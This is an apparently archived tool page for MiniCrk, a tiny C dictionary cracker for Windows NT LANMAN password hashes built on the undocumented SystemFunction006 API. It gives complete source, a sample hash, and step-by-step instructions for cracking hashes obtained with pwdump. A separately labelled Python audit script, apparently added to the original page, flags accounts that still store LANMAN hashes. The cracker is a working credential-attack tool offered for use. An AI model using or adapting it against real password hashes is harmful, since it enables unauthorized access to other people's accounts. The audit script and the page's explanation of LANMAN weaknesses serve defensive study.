
MiniCrk - World's smallest NT LANMAN dictionary cracker

Introduction

There exist over thirty "undocumented" APIs in the Microsoft ADVAPI32.DLL. These functions do everything from RC5 encryption to LANMAN (DES) and NT (MD4) password generation. If you do a dumpbin of the DLL you will see them listed as "SystemFunction###", where the #s represent the function number. Through some sleuthing of the interfaces we were able to document the SystemFunction006() interface as the one that generates the LANMAN passwords. We believe the function has the following prototype:

WINBASEAPI WINAPI SystemFunction006(unsigned char in[14], unsigned char out[16]);

The sample code below for MiniCrk demonstrates how to use this API to write a very simple dictionary cracker.

Implementation Notes

This implementation is meant to be as simple (and short) as possible, to demonstrate how easy it is to write a dictionary cracker for the LANMAN passwords stored by NT. It utilizes Microsoft's own internal DES encryption API for generating LANMAN passwords. This is not meant to be a fast (or flexible) implementation.

For instance, you must "hard code" in the encrypted password and dictionary name. It also doesn't implement common word permutations such as reversed words, word combinations, etc. If you want things like that, you can add them yourself, or try looking at the following implementations:

The example unknown password "552902031BEDE9EFAAD3B435B51404EE" used below is the encrypted form of the word "secret", probably one of the most common passwords of all time. If you want to see this program work, your dictionary file had better contain that word.
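The example hash above also illustrates a property of LANMAN hashes that is useful on the defending side: the password is uppercased, NUL-padded to 14 bytes and split into two independent 7-byte halves, so the second half of any password of 7 characters or fewer is always the same constant, AAD3B435B51404EE (the last 16 hex digits of the "secret" hash), and an account with no LANMAN hash stored at all shows that constant twice. The following audit script is an added example and is not part of MiniCrk; it parses constructed pwdump-style lines (user:rid:lmhash:nthash:::) and flags which accounts still carry a LANMAN hash and which of those hashes cover a short password. The NT hashes in the sample lines are placeholders, and the sample data itself is constructed for the example.

```python
# Added example (not part of MiniCrk): audit pwdump-style entries for LANMAN hash weaknesses.
# The "secret" hash value below is the one quoted on this page; everything else is constructed.

# DES of the constant "KGS!@#$%" under a key of seven NUL bytes, i.e. the LM hash half
# produced for an all-padding 7-byte block.  A second half equal to this means the
# password is at most 7 characters long; both halves equal means no LM hash is stored.
LM_NULL_HALF = "AAD3B435B51404EE"
LM_EMPTY_HASH = LM_NULL_HALF * 2

# Constructed pwdump-style lines: user:rid:lmhash:nthash:::   (NT hashes are placeholders)
SAMPLE_PWDUMP = """\
alice:1001:552902031BEDE9EFAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF:::
bob:1002:AAD3B435B51404EEAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF:::
carol:1003:0123456789ABCDEF0123456789ABCDEF:0123456789ABCDEF0123456789ABCDEF:::
# comment line, ignored
malformed line
"""

HEX_DIGITS = set("0123456789ABCDEF")


def parse_pwdump_line(line):
    """Return (user, lm_hash) for a well-formed pwdump line, or None for
    blank, comment or malformed lines.  The hash is returned uppercased."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split(":")
    if len(fields) < 4:
        return None
    user, lm = fields[0], fields[2].strip().upper()
    if len(lm) != 32 or not set(lm) <= HEX_DIGITS:
        return None
    return user, lm


def classify_lm_hash(lm):
    """'disabled' if no LM hash is stored, 'short' if the password is 7 characters
    or fewer (second half is the NUL-block constant), otherwise 'full' (8-14 chars)."""
    lm = lm.upper()
    if lm == LM_EMPTY_HASH:
        return "disabled"
    if lm[16:] == LM_NULL_HALF:
        return "short"
    return "full"


def audit_pwdump(text):
    """Map each parsable account name to its LM hash classification."""
    verdicts = {}
    for line in text.splitlines():
        parsed = parse_pwdump_line(line)
        if parsed is None:
            continue            # skip comments and malformed input rather than crash
        user, lm = parsed
        verdicts[user] = classify_lm_hash(lm)
    return verdicts


if __name__ == "__main__":
    for user, verdict in audit_pwdump(SAMPLE_PWDUMP).items():
        print(f"{user}: {verdict}")
```

Any account reported as "short" or "full" still has a LANMAN hash on disk and is exposed to exactly the kind of dictionary attack this page describes; the fix is to stop storing LANMAN hashes (Windows exposes this as the "Do not store LAN Manager hash value on next password change" security policy) and to have those users change their passwords, after which the audit reports "disabled". Passwords longer than 14 characters never get a LANMAN hash and also show up as "disabled".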

Installation

There is no special procedure to follow. Just place the program and its associated files in a directory on your computer and run it.

Screenshots

There are no screenshots available at this time.

Future Enhancements

None planned at present.

Known Bugs/Restrictions

No known bugs.

History

Version 1.0.0.1 [December 14, 1998]
Initial version.
Instructions
  1. Modify array unknown[] to contain the encrypted LANMAN password. You can use the pwdump program available from http://src.doc.ic.ac.uk/packages/samba/pwdump/ to get this.
  2. Modify the fopen() to point to your dictionary file.
  3. Compile and link with the Microsoft NT DLL, advapi32.dll (should be automatic).
  4. Run it. The plaintext password will be printed, if found.
Source

#include <windows.h> /* for WINBASEAPI and WINAPI */
#include <stdio.h>   /* for fopen(), fgets(), fclose(), and printf() */
#include <string.h>  /* for memset(), strcspn(), _strupr(), and memcmp() */

#define descrypt SystemFunction006 /* document the internal API */
WINBASEAPI WINAPI descrypt(unsigned char in[14], unsigned char out[16]);

int main(void) {
   unsigned char w[14+2], /* +2, fgets() returns a '\n' and '\0' */
   known[16], unknown[16] = { 0x55,0x29,0x02,0x03,0x1B,0xED,0xE9,0xEF,
                              0xAA,0xD3,0xB4,0x35,0xB5,0x14,0x04,0xEE };
   FILE *fp;

   if (NULL != (fp = fopen("comwords.txt","r"))) {
      for (;;) {
         memset(w, 0, sizeof w);               /* pad to 14 bytes with NULLs */
         if (NULL == fgets((char *)w, 16, fp)) /* stop at EOF; testing feof() instead
                                                  would run the last word twice */
            break;
         w[strcspn((char *)w, "\n")] = '\0';   /* remove '\n' added by fgets() */
         _strupr((char *)w);                   /* LANMAN hashes the uppercased word */
         descrypt(w, known);                   /* encrypt it */
         if (0 == memcmp(known, unknown, 16)) {/* check it */
            printf("%s\n", w);                 /* found it */
            break;                             /* from for */
         }
      } /* end for */
      fclose(fp);
   }
   return 0;
}
 

You can download the source and executable here.



Do you have updates? corrections? suggestions? E-mail us here.
All content © 2000-2002 Mobiusware